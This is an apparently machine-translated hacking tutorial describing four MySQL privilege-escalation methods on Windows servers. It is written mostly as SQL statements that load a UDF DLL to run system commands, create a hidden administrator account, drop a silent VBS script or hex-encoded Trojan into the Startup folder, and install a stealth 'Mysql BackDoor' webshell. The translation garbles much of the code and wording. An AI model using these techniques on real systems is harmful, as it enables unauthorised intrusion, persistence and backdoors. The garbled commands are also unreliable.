Method 4 of mysql Privilege Escalation

I. UDF Privilege Escalation

I think everyone knows about this type of elevation of permission. I will roughly write the following statements:

Create function example shell returns string soname 'udf. dll'
Select external shell ('net user iis_user 123! @ # AbcABC/add ');
Select external shell ('net localgroup administrators iis_user/add ');
Select reverse shell ('regedit/s d: web3389.reg ');
Drop function using shell;
Select foreign shell ('netstat-any ');

Ii. VBS startup Item Elevation of Privilege

Create table a (cmd text );
Insert into a values ("set wshshell = createobject (" "wscript. shell "")");
Insert into a values ("a = wshshell. run (" "cmd.exe/c net user iis_user 123! @ # AbcABC/add "", 0 )");
Insert into a values ("B = wshshell. run (" "cmd.exe/c net localgroup administrators iis_user/add" ", 0 )");
Select * from a into outfile "C: \ Documents ents and Settings \ All Users \" start "Menu \ Program \ Start \ a. vbs ";

First, connect to the database in webshell, create a table, write VBS to the table, and then import the startup item. If the UDF does not have the permission, you can try this method only if you have the ROOT permission, there is a later one. 0 indicates that the CMD window is not displayed and the operation is quiet.

You can also write as follows:

Create table a (cmd BLOB );
Insert into a values (CONVERT (Trojan hexadecimal code, CHAR ));
Select * from a into dumpfile 'C: \ Documents ents and Settings \ All Users \ Start Menu \ Program start \ mm.exe'
Drop table;
Run the first three statements to write the Trojan into the startup. The premise is that the trojan must be in hexadecimal notation, and the path is \, Because windows will automatically filter out

3 Linx Mysql BackDoor elevation

Linx Mysql Door

Mysql BackDoor is a BackDoor developed for the PHP + Mysql server. After the BackDoor is installed, it adds a "state" function that can execute system commands for Mysql, in addition, a Dll-based sniffing backdoor is started along with the Mysql process. This backdoor has the same system permissions as Mysql in Windows, so as to skillfully implement no port and no process, A wall-mounted Trojan without services.

Usage: Upload Mysql. php to the PHP server, click "automatically install Mysql BackDoor", and then run the command directly.
4. Download MIX. DLL

Create table temp_mix (abc longblob );
Insert into temp_mix values (load_file ('d: \ web \ udf. dll '));
Select * from temp_mix into dumpfile 'C: \ Windows \ system32 \ udf. dll ';
Create function MyCmd returns string soname 'udf. dll ';
Select MyCmd ('net user ');
Drop table if exists temp_mix;

The first three sentences mainly aim to put the dll in the system directory. The first sentence is to create a function. Then you can execute the system command. The most common problem is the 4th sentence: can't open shared library 'udf. dll '(error 2); let's talk about it.

Previously. permission escalation once. you can create a function. I forgot why. you need to recreate this function. first, Baidu goes down. drop function MyCmd; to delete the created function. tested. found or not. and then continue searching. this is a mysql bug. run the following statement: delete from mysql. func where name = 'mycmd ';. the test succeeds. the day before yesterday, I stared at the can't open shared library 'udf on the screen again. dll '. we can see this delete statement again. we know that delete is deletion. it is something in the deleted table. can I delete a function by deleting the table below? Then, in turn, is the creation function to insert a new record into the table? In addition, it is mysql. func. That is, the func table in the mysql database. Haha. The name is also like. After testing, the following results are obtained:

At the time of elevation of permission. create a function to display the can't open shared library 'udf. dll '. skip this sentence. execute another sentence. or. replace the 4th sentence with insert into mysql. func values ('mycmd', 0, 'udf. dll ', 'function ');. let's talk about the structure of the func table: 4 columns. name, return, dl, fun. the names of the second and fourth columns are not clear. but the meaning is the same. if you are interested, select * from func. the first column is the name of the new function. string. the second column is the return value. enter 0. the third column of dl indicates the name of the dll where the function is located. string type. the dll name is imported to the system directory. not necessarily udf. dll. just like the one you export. the role of column 4 is unclear. however, you can use the string funciton. it should be a function... this is just an insert operation. so long as it is root. there should be no errors. the following is the same . Select MyCmd ('whoam');. But don't worry! There is a premise: You need to restart MYSQL .. I don't know about MYSQL. however, the new function is absolutely available after restart. it seems that there are other ways to achieve the same effect. it seems like flush. but where is the specific flush. I don't know. however, it is not a permission. it is not a func table. I tried it. and MYSQL. after searching for a long time, I did not find the root user who restarted it in MYSQL. there is always a feeling. no need to restart. which of the following statements is familiar with MYSQL? Tell the younger brother if you know the command...

According to my own recent penetration tests, I found that HKEY_CURRENT_USER handles are not supported no matter whether it was written by jixin or another mysql elevation script. If the server disables CMD, even if there is ROOT, you cannot cancel the ban by writing the Registry. If you can write it, you can share it with me!